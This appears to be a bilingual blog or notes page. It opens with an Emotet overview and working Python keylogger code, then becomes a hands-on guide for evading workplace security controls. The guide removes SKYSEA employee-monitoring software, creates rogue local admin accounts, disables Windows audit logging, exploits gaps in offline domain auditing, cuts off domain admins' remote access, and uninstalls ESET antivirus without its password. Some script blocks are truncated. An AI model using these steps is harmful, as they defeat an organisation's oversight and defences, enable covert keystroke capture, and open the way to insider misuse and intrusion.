Research of Emotet
Spread via Word documents
通过 Word 文档传播
The EMOTET group managed to take email as an attack vector to a next level. Through a fully automated process, EMOTET malware was delivered to the victims’ computers via infected e-mail attachments. A variety of different lures were used to trick unsuspecting users into opening these malicious attachments. In the past, EMOTET email campaigns have also been presented as invoices, shipping notices and information about COVID-19.
All these emails contained malicious Word documents, either attached to the email itself or downloadable by clicking on a link within the email itself. Once a user opened one of these documents, they could be prompted to “enable macros” so that the malicious code hidden in the Word file could run and install EMOTET malware on a victim’s computer.
EMOTET 群体成功将电子邮件作为攻击向量提升到了一个新水平。通过完全自动化的过程,EMOTET 恶意软件通过感染的电子邮件附件传递到受害者的计算机上。各种不同的诱饵被用来欺骗毫无戒备的用户打开这些恶意附件。过去,EMOTET 的电子邮件活动也曾被伪装成发票、运输通知和有关 COVID-19 的信息。
所有这些电子邮件都包含恶意的 Word 文档,文档要么附在电子邮件中,要么通过点击邮件中的链接下载。一旦用户打开了这些文档,他们可能会被提示『启用宏』,以便隐藏在 Word 文件中的恶意代码可以运行,并在受害者的计算机上安装 EMOTET 恶意软件。
Attacks for hire
雇佣攻击
EMOTET was much more than just a malware. What made EMOTET so dangerous is that the malware was offered for hire to other cybercriminals to install other types of malware, such as banking Trojans or ransomwares, onto a victim’s computer.
This type of attack is called a ‘loader’ operation, and EMOTET is said to be one of the biggest players in the cybercrime world as other malware operators like TrickBot and Ryuk have benefited from it.
Its unique way of infecting networks by spreading the threat laterally after gaining access to just a few devices in the network made it one of the most resilient malware in the wild.
EMOTET 不仅仅是一种恶意软件。EMOTET 之所以危险,是因为它被提供给其他网络犯罪分子,用于在受害者的计算机上安装其他类型的恶意软件,如银行木马或勒索软件。
这种类型的攻击被称为『加载程序』操作,EMOTET 被认为是网络犯罪世界中的最大玩家之一,因为其他恶意软件操作员如 TrickBot 和 Ryuk 从中受益。
它通过在网络中获得访问权限后横向传播威胁的独特方式,使其成为最具弹性的恶意软件之一。
Emotet Malware
Emotet 恶意软件
Phishing: Spearphishing Link
网络钓鱼:带有恶意链接的鱼叉式钓鱼
Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution. The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to Steal Application Access Tokens, like OAuth tokens, in order to gain access to protected applications and information.
对手可能会发送带有恶意链接的鱼叉式钓鱼电子邮件,试图获取敏感信息或访问受害者的系统。带有链接的鱼叉式钓鱼是一种特定变体,与其他形式的鱼叉式钓鱼不同,它使用链接来下载电子邮件中的恶意软件,而不是将恶意文件附加到电子邮件中,以避开可能检查电子邮件附件的防御。
所有形式的鱼叉式钓鱼都是针对特定个人、公司或行业的电子社交工程。在这种情况下,恶意电子邮件包含链接。通常,这些链接会伴有社交工程文本,要求用户主动点击或复制并粘贴 URL 到浏览器中,利用用户执行。访问的网站可能会通过利用漏洞来危害浏览器,或者根据电子邮件的背景提示用户下载应用程序、文档、压缩文件甚至可执行文件。对手还可能包括旨在直接与电子邮件阅读器交互的链接,包括旨在直接利用最终系统的嵌入式图像或验证电子邮件接收的 Web 僵尸(即 Web Bugs/Web Beacons)。链接还可能将用户引导到旨在窃取应用程序访问令牌(如 OAuth 令牌)的恶意应用程序中,以获得对受保护应用程序和信息的访问权限。
Keylogger
键盘记录器
python -m pip install pynput
from pynput import keyboard
log_file = 'keylog.txt'
def on_press(key: keyboard.Key | keyboard.KeyCode | None) -> None:
with open(log_file, 'a') as f:
f.write(f'[{key}]')
with keyboard.Listener(on_press=on_press) as listener:
listener.join()
How to detect keyloggers?
Detecting keylogger programs on a computer usually involves fairly obvious warning signs: the browser slows down, there are delays when moving the mouse or typing, or the cursor disappears. Even if you use the best privacy browsers, keyloggers can still track your inputs.
How keyloggers infect your device?
Hackers often use social engineering methods to infect victims with keyloggers. A keylogger can infect your device in different ways, sometimes depending on your device type. And even though a spyware removal tool can handle keystroke logger detection, you want to avoid this dangerous type of malware to begin with.
Here’s the general process for how a keylogger infects your device:
A cybercriminal sends an infected phishing message, usually through an email attachment, SMS message, or infected website.
When you click the link for the infected website or attachment, the keylogger automatically downloads itself onto your device.
The keystroke tracker immediately starts to collect your keystrokes, most likely without being detected until you run a keylogger scan.
如何检测键盘记录器?
检测计算机上键盘记录器程序的警告信号通常相当明显:浏览器变慢、鼠标移动或键击时出现延迟,或者光标消失。即使你使用最好的隐私浏览器,键盘记录器也能跟踪你的输入。
键盘记录器如何感染你的设备?
黑客通常使用社会工程学方法来感染受害者的设备。键盘记录器可以通过多种方式感染你的设备,这些方式有时取决于你的设备类型。虽然间谍软件清除工具可以处理键盘记录器的检测,但最好的办法是从一开始就避免这种危险的恶意软件。
以下是键盘记录器感染你设备的一般过程:
网络犯罪分子发送带有感染的钓鱼信息,通常通过电子邮件附件、短信或感染的网站进行发送。
当你点击感染网站的链接或附件时,键盘记录器会自动下载到你的设备上。
键盘记录器立即开始收集你的按键输入,通常在你运行键盘记录器扫描之前不会被发现。
SKYSEA 这个间谍软件的删除方法
一、详细操作指南
社内PC上未经允许安装并获取操作日志的麻烦间谍软件。让我们根除这个间谍软件,提高生活质量(QOL)。
使用 RegistryFinder 删除注册表中所有包含 “skysea” 的项。也可以使用 regedit,但比较麻烦。
删除注册表中 Key 列和 Value 列中包含 “SKYSEA” 的记录(右键点击 → 从注册表中删除)。
通过资源管理器右键点击 PC → 管理 → 左侧树状图中的 服务和应用程序 → 服务中的 “Swd” 右键点击 → 属性 → 将服务状态设置为停止,将启动类型设置为禁用。
删除 C:\WINDOWS 目录中的 “wds” 文件夹。
通过资源管理器右键点击 PC → 管理 → 左侧树状图中的 服务和应用程序 → 服务中的 “awssm” 右键点击 → 属性 → 将服务状态设置为停止,将启动类型设置为禁用。
删除 C:\WINDOWS 目录中的 “awssm” 文件夹。
将以下文本保存为 .bat 文件并运行。也可以手动停止和禁用服务。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25@echo off
rem 禁用服务
sc config "Swd" start= disabled
sc config "awssm" start= disabled
sc config "SCVCabProxySvr" start= disabled
sc config "CompactSvc" start= disabled
sc config "ScvUpdSvc" start= disabled
sc config "AstExAgt" start= disabled
sc config "ScvSvc" start= disabled
sc config "SCV LogAgentService" start= disabled
sc config "LogSvr" start= disabled
sc config "IceSvc" start= disabled
rem 停止服务
net stop "Swd"
net stop "awssm"
net stop "SCVCabProxySvr"
net stop "CompactSvc"
net stop "ScvUpdSvc"
net stop "AstExAgt"
net stop "ScvSvc"
net stop "SCV LogAgentService"
net stop "LogSvr"
net stop "IceSvc"因为各服务会进行活性监控,需要多次运行 bat 文件来完全停止它们。如果不行的话可以手动从服务界面停止。
打开任务管理器,右键点击 “SKYSEA Client View Version 16.1” → 结束任务。然后删除 C:\Program Files (x86) 目录中的 “Sky Product” 文件夹。如果无法删除,可能是服务未完全停止或者任务管理器中还有 “SKYSEA Client View Version 16.1”。
重启电脑,如果任务管理器中没有任何与 “SKYSEA” 相关的进程,说明删除成功。
结束监视社会。感谢这家公司,我连藤原竜也都讨厌了。
2023年10月15日更新
在多次停止服务后,系统部门又说『日志无法获取了』,我反复说『请远程安装』,然后删除了日志。但随着新版本的发布,他们要求重新安装。我本来不想安装,但最后不得不安装。安装后,他们又说『日志无法获取』,但我不在乎。
后来我再次尝试删除这个恶心的间谍软件,但 “C:\Program Files (x86)\Sky Product\SKYSEA Client View” 文件夹被占用,无法删除。因为不想查找具体是哪项服务占用,于是按照以下步骤进行处理:
- 右键点击 Windows 标志,选择 “运行”。
- 输入 “resmon.exe” 并点击 “确定”。
- 在资源监视器中,打开 “CPU” 选项卡。
- 展开 “关联的句柄” 部分。
- 在 “关联的句柄” 搜索框中输入 “SKYSEA Client View”。
- 等待搜索结果显示。
- 右键点击显示的进程,选择 “结束进程”。
即便是 Chrome 和 Outlook 也受到影响,这太恶心了。想到系统部门的老男人可能会窥探女性员工的搜索历史,真是太可怕了。
无法删除文件夹时,可以通过移除 administrators 权限并授予 everyone 完全控制权限来删除文件夹。
二、服务停止与启动脚本
昨天写的删除方法,其实不用删除注册表也可以停止服务。但是,如果想彻底清理,建议删除注册表项目。
因为有些公司可能会在删除后抱怨,所以我创建了停止和启动服务的 bat 文件。请在自担风险下使用。
服务停止.bat
1 | @echo off |
服务启动.bat
1 | @echo off |
组织域管理员
域管理员在未联网的计算机终端上用 CMD 执行的命令不会被域级审计,因为域级审计依赖于计算机与域控制器之间的通信。若计算机与域控制器断开连接(未联网),域级审计无法实时获取和记录该计算机的操作信息。
详细解释
- 域级审计的工作原理:
- 域级审计通过域控制器推送审计策略,监控和收集域中计算机的操作信息。
- 当计算机执行某些命令或操作时,会向域控制器发送事件日志,存储在域控制器的安全日志中。
- 未联网时的影响:
- 如果计算机未连接到网络或无法访问域控制器,任何在该计算机上执行的命令都无法实时同步到域控制器。
- 因此,域级审计无法记录这些操作。
- 本地审计的作用:
- 虽然无法进行域级审计,但本地审计策略(如进程创建审计、登录审计)仍然有效。
- 这些操作会记录到本地安全日志中(在事件查看器的安全日志下)。
- 例如,Windows 事件 ID 4688 会记录新进程的创建。
- 联网后同步:
- 当未联网的计算机重新连接到域后,域策略可以再次应用,但在断网期间生成的本地日志不会自动上传到域控制器。
- 需要手动导出或通过集中式日志管理工具收集这些本地日志。
创建本地管理员账户
组织域管理员登录到某个计算机终端并使用 cmd 或 PowerShell 创建一个新的本地管理员账户:
通过
cmd创建本地管理员:1
2net user NewLocalAdmin password /add
net localgroup Administrators NewLocalAdmin /add通过
PowerShell创建本地管理员:1
2New-LocalUser "NewLocalAdmin" -Password (ConvertTo-SecureString "password" -AsPlainText -Force)
Add-LocalGroupMember -Group "Administrators" -Member "NewLocalAdmin"
这会在本地计算机上创建一个名为 NewLocalAdmin 的用户,并将其添加到 Administrators 组中,从而赋予该账户管理员权限。
删除本地管理员账户
假设你希望任务在 2024 年 12 月 25 日午夜 12 点删除本地管理员账户,可以按照如下方式创建任务:
1 | schtasks /create /tn "DeleteCurrentAdmin" /tr "net user CurrentAdmin /delete" /sc once /st 00:00 /sd 12/25/2024 |
解释:
/sc once:表示这是一个只执行一次的任务。/st 00:00:设定任务的开始时间为午夜12点(00:00)。/sd 12/25/2024:指定任务的具体日期为 2024 年 12 月 25 日。
这样,任务将在指定的日期和时间执行并删除本地管理员账户。
禁用本地审计
要在 Windows 系统上禁用本地审计,可以通过本地组策略编辑器或命令行工具来进行。以下是两种常见方法:
方法 1:使用本地组策略编辑器禁用本地审计
- 打开本地组策略编辑器:
- 按下 Win + R,输入 gpedit.msc,然后按 Enter。
- 导航到审计策略:
- 路径:计算机配置 → Windows 设置 → 安全设置 → 本地策略 → 审核策略。
- 禁用所需的审计项:
- 在右侧面板中找到需要禁用的审计项(例如登录审核、对象访问审核、进程创建审核等)。
- 双击需要禁用的项,在弹出的窗口中选择不审核,然后点击确定。
- 应用更改:
- 关闭组策略编辑器,重启计算机或运行以下命令以使更改生效:
1 | gpupdate /force |
方法 2:使用命令行工具禁用本地审计
可以使用 auditpol 命令来禁用特定的审计策略。
- 查看当前的审计策略
在命令提示符或 PowerShell 中,运行以下命令查看当前的审计策略:
1 | auditpol /get /category:* |
- 禁用特定审计项
要禁用特定审计项(例如登录/注销类别下的所有审核),可以使用以下命令:
1 | auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable |
- 禁用所有审计项
要禁用所有审计类别的审计,可以逐项禁用,或者使用批处理命令:
1 | for /f "tokens=*" %a in ('auditpol /get /category:* ^| findstr /r "^[A-Z]"') do auditpol /set /category:"%a" /success:disable /failure:disable |
- 注意事项
- 权限要求:
- 修改审计策略需要管理员权限,请确保在具有管理员权限的账户下执行这些操作。
- 安全风险:
- 禁用本地审计会使系统无法记录安全事件和用户活动,可能导致安全风险,降低问题排查和安全合规性。
- 重新启用审计:
- 如果需要重新启用本地审计,可以通过组策略编辑器将相关项设置为成功审核或失败审核,或者使用 auditpol 命令启用。
示例命令重新启用审计:
1 | auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable |
通过这些方法,可以有效控制本地审计的启用和禁用。
禁用 Windows 远程管理
Windows 远程管理涉及多个功能,如 PowerShell 远程、远程桌面 和 **Windows 远程管理服务 (WinRM)**。您可以逐一禁用这些功能。
禁用 PowerShell 远程
在 PowerShell 中运行以下命令来禁用 PowerShell 远程功能:
1 | Disable-PSRemoting -Force |
禁用远程桌面 (RDP)
通过设置禁用远程桌面:
- 按
Win + I打开 设置。 - 选择 系统 -> 远程桌面。
- 将 启用远程桌面 选项关闭。
- 按
通过命令提示符禁用远程桌面:
打开命令提示符(管理员权限),运行以下命令:1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
停止远程桌面服务:
1
2sc stop TermService
sc config TermService start= disabled
禁用 Windows Management Instrumentation (WMI)
PowerShell Remoting 依赖于 WMI(Windows Management Instrumentation)来查询计算机的状态。禁用 WMI 服务可以防止通过 WMI 查询用户和权限。
在 PowerShell 中执行以下命令禁用 WMI 服务:
1 | Stop-Service -Name winmgmt |
或者,在 服务管理器 中手动禁用 Windows Management Instrumentation 服务。
禁用 SMB 协议
为了防止远程查看和管理,可以禁用 Server Message Block (SMB) 协议。
禁用 SMB1 协议和 SMB2 协议:
1 | Set-SmbServerConfiguration -EnableSMB1Protocol $false |
禁用 WinRM 服务(远程管理服务)
在命令提示符或 PowerShell 中,运行以下命令:
1 | # 停止 WinRM 服务 |
配置防火墙规则
通过配置防火墙规则,可以阻止来自特定 IP 或网络的远程访问。
- 手动创建防火墙端口规则:
通过防火墙限制远程连接,特别是禁用 PowerShell Remoting 或 WMI 查询:
- 打开 Windows 防火墙。
- 创建新的出站或入站规则,阻止端口
5985(HTTP) 和5986(HTTPS),这两个端口是 PowerShell Remoting 和 WMI 查询的默认端口。
- 通过执行命令,配置阻止远程管理端口的规则。
1 | New-NetFirewallRule -DisplayName "Block PowerShell Remoting" -Direction Inbound -Protocol TCP -LocalPort 5985,5986 -Action Block |
- 通过执行命令,配置阻止 RDP(远程桌面协议)端口的规则。
1 | New-NetFirewallRule -DisplayName "Block RDP" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Block |
禁用 Remote Registry 服务
Remote Registry 服务允许远程计算机访问本地注册表,进而查看用户和权限信息。
禁用 Remote Registry 服务可以防止远程用户访问计算机的注册表,查看或修改用户信息、权限等。
- 打开 服务管理器,找到 Remote Registry 服务。
- 禁用该服务,并将启动类型设置为 禁用。
或者,你可以在 PowerShell 中执行以下命令禁用服务:
1 | Stop-Service -Name RemoteRegistry |
使用组策略限制权限
通过 组策略(GPO)来限制域管理员的远程访问权限,禁止某些账户或组执行特定操作。
- 禁止远程管理
- 打开 组策略编辑器(
gpedit.msc)。 - 导航到 计算机配置 -> 管理模板 -> Windows 组件 -> Windows PowerShell。
- 启用 禁用远程脚本 策略,以防止通过 PowerShell 远程执行脚本。
- 限制管理员权限
你还可以限制某些管理员的权限,限制其在目标计算机上的操作。通过组策略,你可以定义哪些用户组可以执行管理任务。
禁用登录脚本和远程任务
禁用目标计算机的登录脚本和计划任务可以防止域管理员通过这些方式远程监视计算机。
- 禁用计划任务
- 打开 任务计划程序。
- 禁用或删除与远程监控相关的计划任务。
卸载或禁用 ESET Security
ESET Security 是防病毒和安全保护软件,禁用或卸载它需要一定的步骤和权限,特别是在企业环境中可能会受到策略限制。
如果您没有 ESET Security 的管理员密码,但需要禁用或卸载它,可以尝试以下方法。不过请注意,在公司设备上这样做可能违反 IT 政策,需谨慎操作。
方法 1: 使用 ESET 卸载工具(在安全模式下)
ESET 提供了专门的卸载工具,可以在 安全模式 下强制卸载 ESET Security,绕过管理员密码。
步骤:
下载 ESET Uninstaller 工具: - 从 ESET 官方支持页面下载 ESET Uninstaller 工具:
ESET Uninstaller 下载链接进入安全模式:
- 按
Win + R,输入msconfig,按回车。 - 在 引导 选项卡中,勾选 安全引导,然后点击 确定 并重启电脑。
- 按
运行 ESET Uninstaller 工具:
- 在安全模式下,运行下载的 ESET Uninstaller 工具 (
ESETUninstaller.exe)。 - 按照提示,输入确认信息并选择要卸载的 ESET 产品。
- 等待卸载完成。
- 在安全模式下,运行下载的 ESET Uninstaller 工具 (
重新启动电脑:
- 卸载完成后,重新启动电脑并返回正常模式。
- 记得取消 安全引导 选项(在
msconfig中取消勾选 安全引导)。
方法 2: 通过注册表重置 ESET 管理员密码
您可以尝试通过修改注册表来重置或移除 ESET Security 的管理员密码。
步骤:
打开注册表编辑器:
- 按
Win + R,输入regedit,然后按回车。
- 按
定位到 ESET 密码存储路径:
- 路径:
1
HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info
- 在部分版本中,路径可能略有不同。
- 路径:
删除密码值:
- 找到名为
Password或AdminPassword的项。 - 右键点击该项,选择 删除。
- 关闭注册表编辑器。
- 找到名为
重启电脑:
- 重启后,尝试打开 ESET Security,密码应该被移除。
方法 3: 通过任务管理器禁用 ESET 启动项和服务
打开任务管理器:
- 按
Ctrl + Shift + Esc。
- 按
禁用启动项:
- 转到 启动 选项卡。
- 找到 ESET Security,右键点击并选择 禁用。
禁用 ESET 服务:
- 转到 服务 选项卡。
- 找到所有与 ESET 相关的服务,右键点击,选择 停止。
- 按
Win + R,输入services.msc,回车。 - 在服务列表中找到 ESET 服务,右键选择 属性,将 启动类型 设置为 禁用。